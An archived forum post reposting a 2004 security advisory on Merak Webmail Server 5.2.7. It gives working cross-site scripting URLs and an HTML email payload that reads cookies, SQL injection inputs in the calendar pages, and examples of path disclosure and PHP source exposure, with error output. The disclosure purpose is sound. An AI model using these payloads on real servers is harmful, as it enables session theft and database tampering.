Articles

Metasploit Framework Windows Tutorial
Remote Desktop Connection
Windows Processes That May Be Dangerous
How-To use NetCat a Tutorial
Common Linux Commands
Common Ports
Netcat Commands
HTTP Response Codes
War-Google Hack Terms
Wardriving
Avoiding Social Engineering and Phishing Attacks
Intrusion Detection on Linux
Linux Intrusion Detection
Penetration Testing Guide
Penetration Testing Tools
Social Engineering Fundamentals, Part I: Hacker Tactics
Social engineering (computer security)
The Psychology of Social Engineering

The Archives

General GSO
GovernmentSecurity.org News & Suggestions
In The News
Open Topic
General Security Information
Trash Can
Exploit & Vulnerability Mailing List Archives
Trial Member Forum
Product and Program Reviews GSO Tutorials
System Security
Windows Systems
Beginners Section
Linux & Unix Systems
File Downloads
Exploit Research & Discussion Trojan & Virus Errata
Networking Security / Firewall / IDS / VPN / Routers
System Hardening
E-Mail Security
Wifi Security
Trial Member Uploads
Upload discovered Trojans & Mal ware
GSO Programming Section
C , C++ , VC++
Visual Basic.NET
Perl /CGI
Java/Javascript
PHP/XML/ASP/HTML
Assembly + Other
The Cork Board
Network Security Consultant Directory
Network Security Jobs
The Archives
Encryption Information
General Network Security
Internet Anonymity
HTTP Protocol Security
Linux Security
MS IIS Information
Exploit Articles
Programming / Tool Design
GSO Software Projects
Public Downloads
Microsoft Security Questions and Papers
Help - Search - Member List - Calendar
Full Version: Vulnerabilities In Merak Webmail Server
GovernmentSecurity.org > The Archives > Exploit Articles
qcred11
Aug 18 2004, 06:15 AM
QUOTE


********************************************************************************
********************
                                            CRIOLABS
http://www.criolabs.net



- Software: Merak Webmail Server
- Type: Webmail
- Company: Merak Mail Server, Inc.


********************************************************************************
********************

## Software ##


Software: Merak Webmail Server
Version: 5.2.7
Plataforms: All Windows platforms
Web: http://www.merakmailserver.com/



## Vendor Description ##


Merak's WebMail Server is used by thousands of companies around the world to provide secure (ssl) anytime-anywhere access to home, office or ISP email via a browser or WAP-enabled device.


In less than 10 minutes you can have the same professional email server that organizations such as NATO, the U.S. Navy, the FBI, Toyota, the U.S. Government, and many ISP Providers and Developers depend on every day.




## Vulnerabilities ##


Cross-Site Scripting, Full path disclosure, Exposure of PHP files, SQL-Injection.




## Cross-Site Scripting ##



There are a lot of Input Validation Holes in this soft. An attacker can perform an XSS attack and be able to access the target user's cookies.



/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category="><script>alert()</script>&cserver=&ext=


/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=&cserver=">[XSS]&ext=


/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=&cserver=&ext=">[XSS]


/address.html?id=[id]&sort=&selectsort=&global=">[XSS]&showgroups=&showlite=&category=&cserver=&ext=


/address.html?id=[id]&sort=&selectsort=&global=&showgroups=">[XSS]&showlite=&category=&cserver=&ext=


/address.html?id=[id]&sort=&selectsort=&global=&showgroups=&showlite=">[XSS]&category=&cserver=&ext=


/settings.html?autoresponder=1&id=[id]&spage=">[XSS]


/settings.html?autoresponder=">[XSS]&id=[id]&spage=0


/readmail.html?id=[id]&folder=">[XSS]



The next files (attachment.html,calendar.html), can be executed without knowing user's session ID number.



/attachment.html?attachmentpage_text_error=">[XSS]


/calendar.html?id=1&schedule=admin%40merakdemo.com&cv=n&folder=<script>alert()</script>


/calendar.html?id=1&schedule=koko%40merakdemo.com&sf=addevent&cv=d&ct=">[XSS]


/calendar.html?id=[id]&cv=">[XSS]&ct=[ct]&sf=addevent&ESdhour=8




Also it is possible to inject a XSS in the message directly, example:


Open your mail and write a new message like this :


#Image 1.jpg


<IMG alt="" hspace=0 src="javascript:alert(document.cookie)" align=baseline border=0><IFRAME src="http://www.google.com"></body> </html> </IFRAME>


Then click on the HTML message checkbox (in order to send it in HTML format) -


#Image 2.jpg and 3.jpg


The XSS will be executed on your browser. If you send the message, the XSS also will be executed when the victim read the mail.


#Image 4.jpg



Conclusion: If you send a Content-Type: text/html message with an XSS attack, always will be executed when the victim reads the message.


Also you can send the XSS in the Subject. This XSS is executed when the victim reply to this is in HTML format.






## Full path disclosure ##


Some variables of adress.html can cause that a remote user may be able to determine the installation path.





#Example:



/mail/address.html?id=[id]&sort=criolabs&selectsort=criolabs&global=criolabs&showlite=criolabs&category=criolabs&cserver=&ext=



#Error Example:


Warning: reset(): Passed variable is not an array or object in C:\Archivos de programa\Merak\html\mail\address.html on line 565


Warning: Variable passed to each() is not an array or object in C:\Archivos de programa\Merak\html\mail\address.html on line 566


Warning: reset(): Passed variable is not an array or object in C:\Archivos de programa\Merak\html\mail\inc\function.address.php on line 100


Warning: Variable passed to each() is not an array or object in C:\Archivos de programa\Merak\html\mail\inc\function.address.php on line 101






#Example:


/calendar.html?id=6213dcc45fdbccc9af207d32722b93a7&cv=%22criolabs&ct='criolabs&sf='criolabs



#Error Example:


You can see this in the webmail logs:


Warning: mktime(): Windows does not support negative values for this function in C:\Archivos de programa\Merak\html\mail\inc\function.calendar.php on line 413


Warning: date(): Windows does not support dates prior to midnight (00:00:00), January 1, 1970 in C:\Archivos de programa\Merak\html\mail\inc\function.calendar.php on line 413


Warning: mktime(): Windows does not support negative values for this function in C:\Archivos de programa\Merak\html\mail\inc\function.calendar.php on line 417


Warning: mktime(): Windows does not support negative values for this function in C:\Archivos de programa\Merak\html\mail\inc\function.calendar.php on line 420


Warning: date(): Windows does not support dates prior to midnight (00:00:00), January 1, 1970 in C:\Archivos de programa\Merak\html\mail\inc\function.calendar.php on line 420


Warning: date(): Windows does not support dates prior to midnight (00:00:00), January 1, 1970 in C:\Archivos de programa\Merak\html\mail\inc\function.calendar.php on line 350






## Exposure of PHP files ##



The server allows that remote users can download all the files with .php extension from the server.



#Example:


http://localhost:32000/mail/inc/function.php
http://localhost:32000/mail/inc/function.view.php




## SQL-Injection ##




There are Sql-Injection problems in calendar, a remote user may be able to inject SQL commands.


/calendar.html?id=1'&schedule=[SQL]


You can see in the logs :


DB Calendaring Error
[Microsoft][Controlador ODBC Microsoft Access]
Error de sintaxis (falta operador) en la expresión de consulta 'OWN_Email = ''[sql]''.



/calendar.html?id=1&schedule=koko%40merakdemo.com&sf=addevent&cv=d&ct=';'&Eid=criolabs'


DB Calendaring Error [Microsoft][Controlador ODBC Microsoft Access]
Error de sintaxis en la cadena en la expresión de consulta 'EVN_ID = 'criolabs'''.


DB Calendaring Error [Microsoft][Controlador ODBC Microsoft Access]
Error de sintaxis en la cadena en la expresión de consulta 'RMNEVN_ID = 'criolabs'''.


DB Calendaring Error [Microsoft][Controlador ODBC Microsoft Access]
Error de sintaxis en la cadena en la expresión de consulta 'CNTEVN_ID = 'criolabs'''.


-- --


Source: http://seclists.org/lists/bugtraq/2004/Aug/0241.html
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2005 Invision Power Services, Inc.